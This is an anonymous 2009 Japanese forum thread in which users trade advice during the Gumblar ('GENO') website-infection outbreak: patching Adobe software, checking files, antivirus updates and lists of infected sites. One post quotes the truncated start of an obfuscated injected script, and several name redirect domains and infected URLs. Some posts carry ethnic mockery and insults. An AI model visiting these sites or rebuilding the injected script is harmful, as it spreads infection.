812 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:33 ]
ノートン先生まだ刺身食ってる途中なんだぜ?

813 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:23:34 ]
セキュ板のGENOスレが立った時に、ここ数年でも最凶レベルにやばいって書いたけど本当にやばそうだな

814 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:44 ]
>>806
ageで無駄に行間空ける自己主張むき出しのレス馬鹿すぎる

815 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:24:09 ]
>>799
責任逃れだろう

816 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:12 ]
>>770
×永遠
○延々

・感染した場合、少なくとも感染時に通信したFTPのPassを変更する必要がある
・ウィルスがFTP以外の通信ログを取っているかどうか不明


817 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:14 ]
おいかまうなよ

818 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:22 ]
fc2.com復帰した。ただのメンテだったのか?

819 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:40 ]
>>810
あほの相手して損すんのは自分じゃんか。

820 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:17 ]
ウィルスばっかで嫌じゃぁああああああああああああああああああああ


でもちょっと・・・



821 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:21 ]
ブラスターのときもそうだったけど
ひとたび広がりだすと、亜種が出まくるので
現在OKであっても明日にどうなっているかわからん。

adobeを最新にしていれば大丈夫とあるが本当にそうと言い切れるか?
亜種があっさり突破できるレベルの改善なら一時凌ぎにしかならん。
それともadobeの今回の更新で根本的対処ができたという
確実な情報でも持っているのか?

822 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:25 ]
windows updateが出来ないのはなんでだ? WMP11 IE8とかインストールできない

823 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:31 ]
>>820
台風きたときのわくわく感とか感じたくてここに張り付いてる奴絶対いるなw

824 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:33 ]
>>538
その前にPG2の使い方レクチャーしてくれ
誘導されたとこにいったら怒られた

825 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:42 ]
どっかのアンチウイルスソフト業者がワクチンを無償配布しないものか…

826 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:01 ]
とりあえず
Adobe Reader 9.1.1
Adobe Flash Player 10
が最新でOK?

827 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:08 ]
>>822
割れ厨はダウソへどうぞ

828 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:24 ]
>>823
地震板に加えてウイルス板が

829 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:34 ]
>>823
ドキッ!

830 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:38 ]
www■ribbonmagic■com/
確認。gumblar.cnへ飛ばすコードが2つ挿入されている。
>>324に追加



831 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:40 ]
>>826
カンブリア紀もんじゃね?

832 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:44 ]
>>821
なんか勘違いしてないか? 現状で最新版のFlash PlayerとかAdobe Readerで問題が出たって話はないだろ。
亜種が問題になってるのは>>1にあるような「わかりやすい症状」がどんどん変更されてるからじゃないのか?

833 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:44 ]
>>822
感染しちゃってるからじゃね?

834 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:46 ]
とにかくGENOは何らかの償いをするべきだ

835 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:05 ]
・sqlsodbc.chmは正常値(XP)
・数日前に突然explorer.exeが落ちた
・ウイルスバスターでスキャンしたら異常なし
・cmdとregeditは起動できる

これはどう判断すればいいんだ

836 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:13 ]
>>823
わくわく通り越してぐったりだよ・・・

837 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:15 ]
お前ら実はこの状況を楽しんでるだろ?

838 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:32 ]
ノートン新しい定義ファイル来たけどどうだろ?

839 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:28:45 ]
>>821
絶対大丈夫なんて誰も保証できない。

今回だけじゃなくネットで遊んでれば何時だって危険に晒されてるのが
現状じゃ有るまいか?
今回はadobeを最新にするのがベストって事でそんなに木馬やウイルスが
怖いなら携帯でするしかないぜ。

840 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:51 ]
>>835
サイトとかもってないんか



841 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:53 ]
>>835
エクスプローラが落ちるのはWindowsなら良くある話

842 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:54 ]
>>782

それ極論ね

少なくとも今回のはそれで防げるんだから

それ以上の対策はないし

未来のウィルス防げるなウィルスなんて存在してないって。

843 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:10 ]
>>837
…まあ

844 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:39 ]
>>824
ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/

845 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:43 ]
>>842

もういいって。

寝なよ。疲れたろ。

846 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:10 ]
>>835
台湾バスターは対応してませんが?

847 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:22 ]
>>823
俺なんて目まいがして吐き気が出てる

848 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:31 ]
>>840
昔(何年も前)持ってたけど今はない、でもffftpは入ったまま

849 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:33 ]
>>721
"…\chrome.exe" --disable-javascript --disable-java --disable-plagin --user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.0)"

850 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:46 ]
>>821
もっともだと思うが、Adobeの脆弱性以外の経路まで疑いに入れると、それはもはや
任意の新規ウイルスに対する心構えをどうにかするってレベルと同じ話になってしまうと思われ。

そうなった場合、もはやこのスレに張り付く以外にも新規の脆弱性関連の速報の収集とか、
未知のゼロデイアタックに対する一般的な対処法の検討とか、いろいろやらなければならない事が多すぎる。



851 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:48 ]
>>847
きみは豚の方だ

852 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:51 ]
なんだこの改行厨
そんなに自分のレス目立たせたいのか
自己顕示欲の塊みたいなやつだなw
それとも火消しに必死などっかの社員か?

853 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:52 ]
>>477
改行豚は死んでこいや

854 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:59 ]
先生には優しいスレだな
今まで頼り切ってたからこれからもがんばってもらわないと困る

855 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:07 ]
GENOにとってはかえって宣伝になってんじゃねえか。
だって名前さえ知らなかった奴のほうが多いだろ?
いいか悪いかはともかく名前はずいぶん売れてるじゃんか。ほぼ2ch限定で。

856 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:31:08 ]
>>835
explorerはウイルスじゃなくても割と落ちる

857 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:16 ]
このウィルスを知らない人がどんどん感染していく始末

858 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:28 ]
もうgenoウィルスで定着しただろ

859 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:14 ]
バスターがGENOウイルスって命名してなかったか?

860 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:21 ]
じぇの?



861 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:36 ]
                 /゚     。
               ゚ヽ   {___/ ,.-‐ 。
                  )'´  豚 `ヽ. 大阪人アホやから
            。__,′・     ・  ─- 。とりつきやすかったわ
               { ┌‐──┐ j、
               .ゝ、 ̄ ̄ ̄_,ノ ヽ。
              ゚´    厂 ̄ }
ぱんでみっく            ゚   ゚    大阪人由来で
 したろかー /゚     。              /゚     。 大阪弁になってしもたわ
     ゚ヽ   {___/ ,.-‐ 。     ゚ヽ   {___/ ,.-‐ 。
        )'´  豚 `ヽ.            )'´  豚 `ヽ.    あほインフルエンザて呼んでや
   。__,′・     ・  ─- 。   。__,′・     ・  ─- 。
      { ┌‐──┐ j、         { ┌‐──┐ j、
      .ゝ、 ̄ ̄ ̄_,ノ ヽ。       .ゝ、 ̄ ̄ ̄_,ノ ヽ。
    ゚´    厂 ̄ }          ゚´    厂 ̄ }
          ゚   ゚                ゚   ゚

862 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:43 ]
>>848
まあexplorer落ちることよくあるんで大丈夫じゃないかね
感染サイト見たわけでもなさそうだしね

863 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:55 ]
>>824
ほらよ、PG2の使い方紹介サイト

ttp://ff11.my-sv.net/pg2/install.html
ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
ttp://forum.gemini777.net/tutorials/pg_jp.php
ttp://www.nicovideo.jp/watch/nm2825098

864 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:01 ]
さて、下火になったことだし寝るかな

865 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:05 ]
バスターなんか役に立つと思ってる奴マジで言ってんのかお?大爆笑

866 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:14 ]
>>832
「これとこれさえ対策すれば全部OK!」なんて油断している奴を狙うのが今時のウイルスなんだがね。
ましてやここはセキュリティ板。未知の攻撃に警戒して何が悪い?

867 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:53 ]
大丈夫だろって言っている奴は
こんなスレなんて無視すりゃいいだけだな

868 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:08 ]
GENON ENESIS

869 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:09 ]
俺の火狐もよく落ちる
でも感染して無いし怪しいとこ踏んでない

870 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:14 ]
感染報告ありの個人サイト持ちの対処として、(Winでxp、詳しい知識ない)

pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
FFFTPはソフトごと削除

これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい?
勿論、毎日このスレはROMする



871 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:18 ]
UACはユーザーアカウントコントロールな……

872 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:24 ]
このウイルスってパソコンだけ?
ケータイも関係あるのかな

873 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:34:29 ]
>>821

旧FlashやReaderの脆弱性を突いただけで

対策されたバージョンの穴を見つけることなんておいそれと出来ないよ

まぁプログラムとか自分で組めない人はこんなもんか。

874 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:47 ]
バスター厨は、どこの板から来たの?

875 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:52 ]
感染してるか気になる奴ってなんでウィルスチェックしないんだろう

876 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:54 ]
リボンマジックは既にGoogle先生によって攻撃サイトとして登録済み
また、ribbonmagicはgumblar.cnに飛ばすコードであり、現在のところgumblar.cnは応答しない
ただしいつmartuz.cnに飛ばすコードに書き換えられるかわからないので注意

877 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:58 ]
>>862
今のところは感染してないってことでいいのかな。サンクス

878 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:02 ]
サイト管理者向けですが。

Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks. (Sophos)
ttp://www.sophos.com/blogs/sophoslabs/v/post/4422
HTMLだけじゃなくPHPもやられるので、借り物のPHPスクリプト
(XOOPSとかMediaWikiとかPukiWikiとかphpBBとかvBulletinとかWordPressとか)を
中身も見ず・よくわからずに使ってる人は自分のサイトをちゃんと確認してね!

879 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:05 ]
Yahoo!のトップにニュース出してくれよー

880 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:45 ]
IEのjs無効ってどうやるの?



881 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:56 ]
>>879
それくらいしてくれればいいんだけどね。
今は豚インフルでてんやわんやだから・・・

882 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:36:32 ]
いや別にITニュースの枠は別にひとつくらい空けられるし
ITmediaなりImpressなりが配信すれば一発だろ

883 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:36:39 ]
>>880
ネットしなければ良いんだよ

884 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:28 ]
そろそろ大阪は日本から独立すべきだな

885 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:46 ]
一般人はPCのウィルスより豚のほうが大事なんだろうな

886 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:55 ]
www■senlights■co■jp/seihin/kirenaru-1s■htm
このサイト感染するみたいだし、誰かVmwareで動作試験しといてよ
PDFやフラッシュでのバージョンごとの感染の確認や、sqlsodbc.chm改変の有無
感染後にカスぺで本当に検出できるかどうか

887 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:03 ]
>>880
セキュリティのカスタマイズ
ついでにActiveXも切っておけ

Java関係とActiveXを切って安心と思ったけど、
画像見ただけで感染するタイプのウイルスあったよね?

888 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:06 ]
だからぁw
おまえら踊らされすぎ
Adobe関連を最新版にしとけば
普段の生活でいんだって。
煽り厨うざいわ

889 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:08 ]
サイズもハッシュも違ったから感染してるんだろうけど
その他の症状が出ないんだよなあ
再起動怖くてできない

890 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:11 ]
sage方も知らんやつが
なんか偉そうなこと言うてるで^^;



891 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:24 ]
>>886
言い出しっぺの法則

892 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:27 ]
>>885
職場以外でPC触らない人ならそんなもんだろ

893 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:34 ]
・自転車の前カゴに財布
・磁気キャッシュカード
・パスワードは生年月日
・暗号化なしで無線LAN

平和な日本! PCにマルウェア仕込まれるくらい何でもないぜ!

894 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:42 ]
>>886
用意できたらいくわ

895 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:49 ]
>>870
別にFTP接続ソフトを削除する必要は無いよ。
起動して接続しなければいい。

896 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:50 ]
              _,. -―――- 、
            /: : ‐: : : : : : :‐- 、: :\
            /: : /: : : : : : :\: : : : \: :\
         /: :/: :.|: : : : : ! : : : \: : : :.ヽ: : ヽ
         /: /: : 八: :!: : :|\: : : : ヽ: : : :',: : :.',
        ,': /ニ7⌒!:.!: : :| ⌒ : : : : : : : : |: : : :!
          /: :.|: :./  V\: !   ヽ: :!: :.|\|: : : :.\__,
       /: : :ハ: :|     ヾ   ∨!∨: : : : : : : : :ヽ
        /: : : : :.V:! x=ミ    x=ミ. !: : : : ハ: : : : : :.ハ
     /:/: : : : /: :! 、、  、       、、 !: : !: : :!: : : : : : :.}
     // |: : : /| :八    - 、    ,ィ: :/: : /: :ハ: : :|V
     {! 从: i'´ ̄::::>、 `ー '  イ!V /: : /: / |: :/
 _人_    /N::::_:::::/::| ` r ' //:/: /‐く  V     Kaspersky♪ Kaspersky♪
 `Y´    /::::::://:::/:::::|  ><  /:::丁´:::::::::::::V゚}∩  *
       /::::nんh_::∧:::::}/八. ∨::::::」::::::::::〈ヽ.ノ///〉
.     /:/| ! // 〉:::::>ヘ.ノ八 ソ::::{::::::::::::/:::}    っ
    //:::::::\__ノ〉::〈:::::::|/ ∧〉::::〉::::::::/::::∧  , ィ´
    /:::::::::::::::::::::/::::::::\::! /:::::>'´::::::::/::::/:::い.ノ):〉
    !:::::::::::::::::::/:::::::::::::::::ヾ厶イ:::::::::::::/:::/:::::::ヽノ:/
    |::::::::::::::/ヽ:::::::::::::::<>:::::::::::::::::::/ |:::::::::::::::::::/  *
    `ー七:::::::::::::::::::::::::::::::::::::::::::::::::/ |:::::::::::::::::/
     //:::::::::::::::::::::::<>::::::::::/::::/  ヽ:::::::::::/
   /⌒〈:::::::::::::::::::::::::::::::::::イ::::::::/    `ー‐'  *

897 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:53 ]
vistaでの感染は0ですか?

898 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:39:27 ]
>>888
そうやって安心したいのはわかる
とりあえずもう一度完全スキャンやり直せ
引っかかったらPC叩き壊せ

899 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:26 ]
質問してくるやつは、まずスキャンしろよ

900 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:51 ]
>>896
ゆいぃいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいい



901 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:56 ]
>>892
職場のPCでネットサーフィンしまくってる奴いるんだが大丈夫だろうか

902 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:17 ]
>>894
頼んだ。
sqlsodbc.chm改変の有無、感染後にカスぺで本当に検出できるかどうか
上記2つが事実でなかったらテンプレの対策意味なくなるしな

903 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:33 ]
>>896
そんなのに萌えてる余裕は無い
感染してたらもうダメなんだろうな…

904 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:37 ]
Youtubeとか動画サイトがやられると困るので、
中の人はセキュリティの見直しお願いします


905 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:56 ]
>>897
UAC機能無効にしてたらアウト

JaneStyleの作者がUAC無効にしろとか狂ったこと言い放ってたから
(銭ブラがVistaに対応してないという指摘への暫定対処らしいが未だに暫定のまま)
鵜呑みにして設定変えちゃってる奴も少なくないだろう

906 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:02 ]
>>873
ただ怖いのは、FlashやAdobe Readerの脆弱性狙いの効果が薄れたら
動作を止めておとなしくしているかもしれないってこと。
で、新たな脆弱性が見つかったら活動再開。

907 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:03 ]
>>893
今どきそんなATMスペックで街中闊歩してるのは情弱のバカくらいしかいないだろ






うわああああああバカだらけだ日本www

908 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:17 ]
雨降ってきたな

909 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:22 ]
>>901
この実話教えてやれよ
50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございます
けど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?
995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が2CHでエロZIp
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの?と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる

910 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:26 ]
ええと、例の乙女ゲーのURLをチェッカーに放り込んだんだが、
<script language=javascript><!--
(function(){var goC='%';var xouq='<76<61<72<20a<3d<22<53<63<...
って感じで意味不明な値がずっと続いてる場合感染してる、でおk?



911 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:29 ]
>>901
まず社会人としてアウトだろ

912 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:32 ]
>>903
人生が終わるわけでもなかろうに
個人情報は抜き取られるけど

913 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:39 ]
>>903
げんじつとうひという希望がある

914 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:42:43 ]
>>901
かなりヤバイかもね〜
・・・と会社のPCから書き込んでみる

915 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:05 ]
>>901
たぶんPCの管理者が死ぬ

916 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:12 ]
基本的にセキュ板は

トイレのドアノブにばい菌があるからハンカチ使って空けるような潔癖症のキチガイの集まりだから

一般の人は

FlashとReaderを最新版に

これだけでいいよ

無駄に不安煽るのが

ここのクズどもだから

917 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:29 ]
sqlsodbc.chmってファイル何なの?
拡張子はヘルプ関係らしいが・・・
消しちゃダメかな?

918 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:39 ]
>>909
よし明日にでも教えるわ

919 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:41 ]
もう900超えたのか・・・

920 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:53 ]
>>734
Adobe Flash Playerを使わない
も追加しないとマズイのでは?



921 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:53 ]
>>916
なんでそんな必死なん

922 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:56 ]
>>905
どうやったら無効にできるかわからないし
そもそも今現在有効なのかすらわからない…
どこを見たらいいの?

923 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:44:06 ]
ノートン更新来た
GENO対応したか?

924 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:44:45 ]
>>922
ええーそんなレベルでネットやってるんですかぁー

925 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:44:48 ]
セキュ板民を煽ってるのにセキュ板で書き込みしてるやつって馬鹿なの?

926 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:09 ]
ウイルスバスターの更新はまだか?

927 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:25 ]
>>681
この状態で一週間後?想像したくもないわ

928 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:56 ]
>>916
とかなんとか言いながら、自分はしっかりと
マスクと食品備蓄して対策しているんだろ!

929 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:00 ]
>>922
知らないんならいじってないってことだろ

930 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:04 ]
しばらくネットは携帯からだな…



931 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:06 ]
>>926
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル

932 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:17 ]
>>922
そんな状態なら無効にして無いのかもな

933 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:46:19 ]
Norton先生はさっきからひっきりなしに更新してるわ

934 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:24 ]
>>926
まだ来てないっぽい

935 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:29 ]
>>922
おまw
UACでググれよ

936 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:44 ]
このスレ以外インターネットのどこでも盛り上がってないけど、
これって達の悪いジョークとかじゃないの???

937 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:02 ]
>>905
凄いなそれ。OS標準の保護を無効にさせるアプリケーションかよ。
UACがそういうアプリを駆逐してくれるはずなんだがなあ。

>>916
まあまあ、別にハンカチでドアノブ掴んだっていいじゃねえか。
キレイ好きなのは悪いことじゃないだろ。とりあえず手洗わない奴多すぎだし。

938 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:05 ]
>>917
sqlsodbc.chmが改変されるのはウィルスがバージョンチェックの目印にしてるだけっぽいから
既に感染していたり他の所にチェックを入れるウィルスの亜種だと意味無いのでは?

939 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:18 ]
live one careはのんびりやで〜

940 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:20 ]
>>936
このスレよりもっと盛り上がってるところが別にあるけどね。



941 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:27 ]
ファミ

942 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:28 ]
>>924
すいません

>>929
そういうものなんですか
たまに盾みたいなアイコンが出るあれがそうですか?

943 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:34 ]
>>934
そう…ありがとう…なんか辛いよ…

944 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:01 ]
>>936
おまえのインターネットって、ずいぶん狭い世界なんだな

945 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:00 ]
我らがavastさんはまだか!

946 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:08 ]
>>907
アメリカいったら発狂するぞw

947 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:17 ]
>>941
途中送信しちまった
ファミ通も感染したらしいしやばいな

948 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:30 ]
>>905
JaneStyle使いは負け組みケテーイ


949 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:49 ]
>>936
じゃあ感染URL踏んでらっしゃい

950 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:01 ]
ノートンのさっきの更新がこれに対応したものなのかどうか
試そうにも違ったら困るので試せないw



951 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:02 ]
>>945
なんかavast!さん結構前から入ってるとか聞いたけど

